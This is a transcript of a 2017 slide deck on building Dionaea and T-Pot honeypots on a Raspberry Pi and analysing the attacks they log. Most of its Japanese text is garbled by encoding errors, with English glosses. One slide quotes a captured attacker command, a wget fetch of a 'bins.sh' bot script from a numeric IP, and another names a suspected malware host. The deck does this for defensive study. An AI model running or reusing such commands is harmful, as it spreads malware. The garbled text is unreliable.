Upgrade to Pro — share decks privately, control downloads, hide ads and more …

honey-pot with respberry-pi and T-Pot

kobad
May 28, 2017

honey-pot with respberry-pi and T-Pot

honey-pot with respberry-pi and T-Pot

kobad

May 28, 2017
Tweet

Other Decks in Technology

Transcript

  1. HONEY POTTER ໨ඪ GOAL ▸ ݟश͍ϋχʔϙολʔʹͳΔ (Become a beginner honey

    potter) ▸ ߈ܸ͞ΕͯΔ͜ͱΛ஌Δ (Know that we are attacked) ▸ ϋχʔϙοτͷߏஙͱղੳํ๏Λ஌Δ (How to construct and analyze) 3
  2. HONEY POTTER ղੳʹ͍ͭͯ ▸ ϩάղੳ͸ܦݧ͕େࣄʢΒ͍͠ʣ(Experience is important for log analysis)

    ▸ ࣗ෼΋ݟश͍ͳͷͰશһ͕πʔϧΛ࢖ͬͯͰ͖Δͱ͜Ζ·Ͱ ΍ͬͯݟΔ (I analyze it by using tools) 4
  3. ϋχʔϙοτͱ͸ ϋχʔϙοτͷछྨ ▸ ߴର࿩ܕ (high-interaction) ▸ ੬ऑੑΛ࢒ͨ͠ຊ෺ͷOS, ΞϓϦέʔγϣϯ (All Real

    OS, Application) ▸ ௿ର࿩ܕ(low-interaction) ▸ ಛఆͷOS, ΞϓϦέʔγϣϯΛ໛฿ (Specific OS, Application) 9
  4. ϋχʔϙοτͱ͸ ͋ΒΏΔαʔϏεΛ໛฿ ▸ Database type ▸ Mongo-DB HoneyProxy ▸ Web

    type ▸ Glastopf, Dionaea ▸ SSH type ▸ Kippo, Cowrie ▸ Malware Collector, etc… ▸ Ϧετ- https://github.com/paralax/awesome-honeypots 11
  5. HONEEEPI DIONAEA ▸ https://github.com/gento/dionaea ▸ ϋΤτϦάα - Dionaea muscipula ▸

    ෳ਺ͷWebΞϓϦέʔγϣϯΛӡ༻(multiple applications) ▸ FTP, TFTP, HTTP, HTTPS, MSB, SIP, MSSQL, MySQL 16
  6. HONEEEPI ߏங࣌ؾΛ͚ͭΔ͜ͱ ▸ SSHઃఆ (Setting of ssh) ▸ ϩάग़ྗઃఆ (Setting

    of log output) ▸ ݕ஌ճආ(Dionaea) (Detective evasion) 22
  7. HONEEEPI SSHઃఆ ▸ ϙʔτมߋ( 22 → ?????) (Change port number)

    ▸ RSAೝূ (RSA Authentication) ▸ ύεϫʔυೝূOFF 23
  8. HONEEEPI ݕ஌ճආ(DIONAEA) ▸ FTP - ϨεϙϯεϝοηʔδͰ൑ఆ ▸ Welcome to the

    ftp service ͱൺֱ ▸ ϨεϙϯεϝοηʔδΛม͑Ε͹ྑ͍ 27
  9. HONEEEPI ݕ஌ճආ(DIONAEA) ▸ MSSQL - pre-login TDS package (Tabular Data

    Streams)ͷ ৘ใΛνΣοΫ͍ͯ͠Δ ▸ tokenTypeΛॻ͖׵͑Δ ▸ /opt/dionaea/lib/dionaea/python/dionaea/mssql/mssql.py 29
  10. 39

  11. 40

  12. HONEEEPI 123.207.23.254 ▸ ҟৗʹΞΫηε਺͕ଟ͍ (a lot of access) ▸ ͜Ε͔Βಈ͖͕͋Δ͔΋

    ▸ ࠓޙผͷϒϥοΫϦετʹೖΔՄೳੑ΋͋ΔͷͰɺఆظతʹ νΣοΫ͢Δ (It may go in blacklist in the future) 42
  13. HONEEEPI ଞͷIP΋ௐ΂ͯݟΔ(ANOTHER IP) ▸ 167.160.182.27 - ϑϩϦμ, ϒϥοΫϦετͳ͠ ▸ 115.182.95.66

    - தࠃ, ϒϥοΫϦετͳ͠ ▸ 36.111.34.139 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 123.57.255.171 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 211.149.200.156 -115.182.95.66 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 220.174.150.90 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 61.133.116.18 - தࠃ(Shandong Liaocheng), ϒϥοΫϦετ3Օॴ 43
  14. 61.133.116.18 CBLͷ৘ใΛݟͯΈͨ ▸ http://www.abuseat.org/lookup.cgi ▸ ͔͜͜ΒτϩΠͷ໦അɺϥϯαϜ΢ΣΞɺϘοτωοτͱͳ Δ΢Πϧε͕ײછΛड͚͍ͯͨ (Trojan horse, Ransomware,

    Botnet) ▸ h ttp ://n. hm ibl go j a.ru/ ͕ײછݯͷՄೳੑ͕͋Δ(઀ଓ͠ ͳ͍Ͱ͍ͩ͘͞) ▸ virustotal Ͱௐ΂ͯ΋Ϛϧ΢ΣΞ͕ݕग़͞Εͨ 45
  15. T-POT DIONAEA ▸ https://github.com/gento/dionaea ▸ ϋΤτϦάα - Dionaea muscipula ▸

    ෳ਺ͷWebΞϓϦέʔγϣϯΛӡ༻ ▸ FTP, TFTP, HTTP, HTTPS, MSB, SIP, MSSQL, MySQL 52
  16. 69

  17. T-POT LOG ▸ wget http:// 185.73.147. 5/ bins.sh ▸ bins.sh

    ΛDL͠Α͏ͱͯ͠Δ ▸ IP෦෼͕ҧ͏ύλʔϯ΋ଟ͘ݟ͚ͭΒΕͨ 72
  18. 78

  19. HONEY POT SUMMARY ▸ ϋχʔϙοτ͸؆୯ʹߏஙͰ͖Δ (Creating honeypot is easy) ▸

    ຖ೔ຖඵ߈ܸΛड͚ͯΔʂ(We are attacked everyday) ▸ ՄࢹԽͱπʔϧͷ͓͔͛ͰͳΜͱແ͘ղੳͬΆ͍͜ͱ͕Ͱ͖ ͨ 84